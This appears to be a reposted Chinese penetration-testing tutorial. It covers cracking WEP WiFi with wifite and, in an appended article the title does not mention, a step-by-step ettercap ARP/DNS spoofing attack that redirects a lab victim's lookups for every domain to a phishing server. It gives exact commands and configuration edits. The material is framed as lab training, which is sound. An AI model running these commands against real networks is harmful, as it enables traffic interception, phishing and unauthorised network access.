无线WiFi安全渗透与攻防之WIFI07-WEP-wifite自动化渗透WEP加密 admin 2023-09-20 11:30:02 篇首语:本文由小编为大家整理,主要介绍了无线WiFi安全渗透与攻防之WIFI07-WEP-wifite自动化渗透WEP加密相关的知识,希望对你有一定的参考价值。 WIFI07-WEP-wifite自动化渗透WEP加密 1.wifite介绍 wifite是一款自动化wep、wpa以及wps破解工具,不支持windows和osx。wifite的特点是可以同时攻击多个采用wep和wpa加密的网络。wifite只需简单的配置即可自动化运行,期间无需人工干预。 目前支持任何linux发行版、Backtrack 5 R1, BlackBuntu, BackBox, Kali(默认自带), CDLinux等。 wifite 破解wep加密wifi时,会采用很多种攻击方式,比如说chopchop攻击,fake欺骗认证码等等,不一定会采用哪个方式破解。不一定能一次性成功。 2.扫描介绍 环境准备 准备好一块无线网卡,运行在kali机器上 ip a 1.扫描无线网络 wifite 2.停止wifi扫描 ctrl+c 3.扫描某个信道 wifite -c 1-c:信道扫描目标 4.扫描wep加密类型的wifi wifite -wep-wep 只针对WEP网络 3.破解步骤 注意:学习时,需要提前在AP上连接一个STA,破解成功率比较高 1.扫描wep加密类型的wifi wifite -wep-wep 只针对WEP网络 2.停止wifi扫描 ctrl+c 3.选择要破解的AP 输入wifi扫描结果前的序号 实际上收集ivs会非常的慢,我们可以通过断开STA和AP的连接,然后在重新连接STA和AP以加快收集ivs的速度 4.等待ivs到达10000以后,工具自动尝试破解 完成后会在目录下生成一个文件,里面包含着AP的信息 ARP渗透与攻防之Ettercap Dns劫持系列文章 ARP渗透与攻防(一)之ARP原理 ARP渗透与攻防(二)之断网攻击 ARP渗透与攻防(三)之流量分析 ARP渗透与攻防(四)之WireShark截获用户数据 ARP渗透与攻防(五)之Ettercap劫持用户流量 ARP渗透与攻防(六)之限制网速攻击 ARP-Ettercap Dns劫持 1.什么是DNS 1.概念 DNS是Domain Name System的缩写, 我们称之域名系统。首先它是远程调用服务,本地默认占用53端口,它本身的实质上一个域名和ip的数据库服务器,他要完成的任务是帮我们把输入的域名转换成ip地址,之后通过ip寻址连接目标服务器。 2.工作过程 当访问一个网站时系统将从DNS缓存中读取该域名所对应的IP地址,当查找不到时就会到系统中查找hosts文件,如果还没有那么才会向DNS服务器请求一个DNS查询,DNS服务器将返回该域名所对应的IP,在你的系统收到解析地址以后将使用该IP地址进行访问,同时将解析缓存到本地的DNS缓存中。 2.什么是DNS劫持 1.概念 DNS劫持又称域名劫持,是指在劫持的网络范围内拦截域名解析的请求,分析请求的域名,把审查范围以外的请求放行,否则返回假的IP地址或者什么都不做使请求失去响应,其效果就是对特定的网络不能访问或访问的是假网址。 2.ettercap劫持的原理 局域网劫持, 攻击者通过伪装成网关, 劫持受害者的网络请求, 将网络请求拦截到指定的服务器 3.DNS常用命令讲解 1.查看DNS缓存表 ipconfig /displaydns 2.获取DNS地址: ping maishibing.com 2.刷新DNS缓存 ipconfig /flushdns 3.ARP-DNS欺骗攻击步骤 环境准备 kali 作为ARP攻击机,IP地址:192.168.110.12 win10 作为被攻击方,IP地址:192.168.110.11 网关(路由器),IP地址:192.168.110.1 1.kali开启apache服务 service apache2 start 2.kali浏览器访问Apache的首页 http://192.168.110.12 确认apache服务已经开启 3.编辑ettercap配置文件 1.进入配置文件位置 cd /etc/ettercap 2.复制原有的配置文件(环境恢复比较方便) cp etter.dns etter.dns2 3.设置dns劫持配置文件 vi /etc/ettercap/etter.dns添加以下内容* A 192.168.110.12* PTR 192.168.110.12wq保存参数*:通配符,代表所有的网站都将被解析到192.168.110.12 也可以换成指定的网站,比如www.jd.com,表示将www.jd.com解析到192.168.110.12A:常被用于正向地址解析,后面跟上钓鱼的ip地址PTR :常被用于反向地址解析,后面跟上钓鱼的ip地址 5.ettercap劫持命令讲解 ettercap -i eth0 -Tq -M arp:remote -P dns_spoof /被攻击者ip// /被攻击者网关// -i:网卡 -T:文本模式 -q:安静模式 -M:执行mitm攻击 -P:plugin 开始该插件 4.靶机访问以下网站确认环境正常 http://www.jd.com/ 6.执行劫持命令 ettercap -i eth0 -Tq -M arp:remote -P dns_spoof /192.168.110.11// /192.168.110.1// >b.txt 7.分析日志 tail -f b.txt或者tail -f b.txt | grep "dns_spoof" 8.靶机重新访问以下网站查看攻击效果 http://www.jd.com/ 可以看到虽然靶机访问的是jd.com,但打开的却是我们钓鱼的网站,DNS欺骗成功。 9.停止劫持 Ctrl+C 10.恢复dns列表,刷新dns缓存即可。 ipconfig /flushdns 刷新前: 刷新后: 11.靶机访问以下网站查看环境是否恢复正常 http://www.jd.com/ 可以看到环境恢复正常了 12.恢复kali环境 1.进入配置文件位置 cd /etc/ettercap 2.复制dns文件到新文件 cp etter.dns etter.dns1 3.还原dns配置文件 将我们之前拷贝的etter.dns2备份文件回复正常 cp etter.dns2 etter.dns以上是关于无线WiFi安全渗透与攻防之WIFI07-WEP-wifite自动化渗透WEP加密的主要内容,如果未能解决你的问题,请参考以下文章 swagger在maven的使用 txt格式中换行符号是啥 您可能还会对下面的文章感兴趣: 相关文章 浏览器打不开网址提示“ERR_CONNECTION_TIMED_OUT”错误代码的解决方法 如何安装ocx控件 VMware的虚拟机为啥ip地址老是自动变化 vbyone和EDP区别 linux/debian到底怎么重启和关机 苹果平板键盘被弄到上方去了,如何调回正常? 机器学习常用距离度量 如何查看kindle型号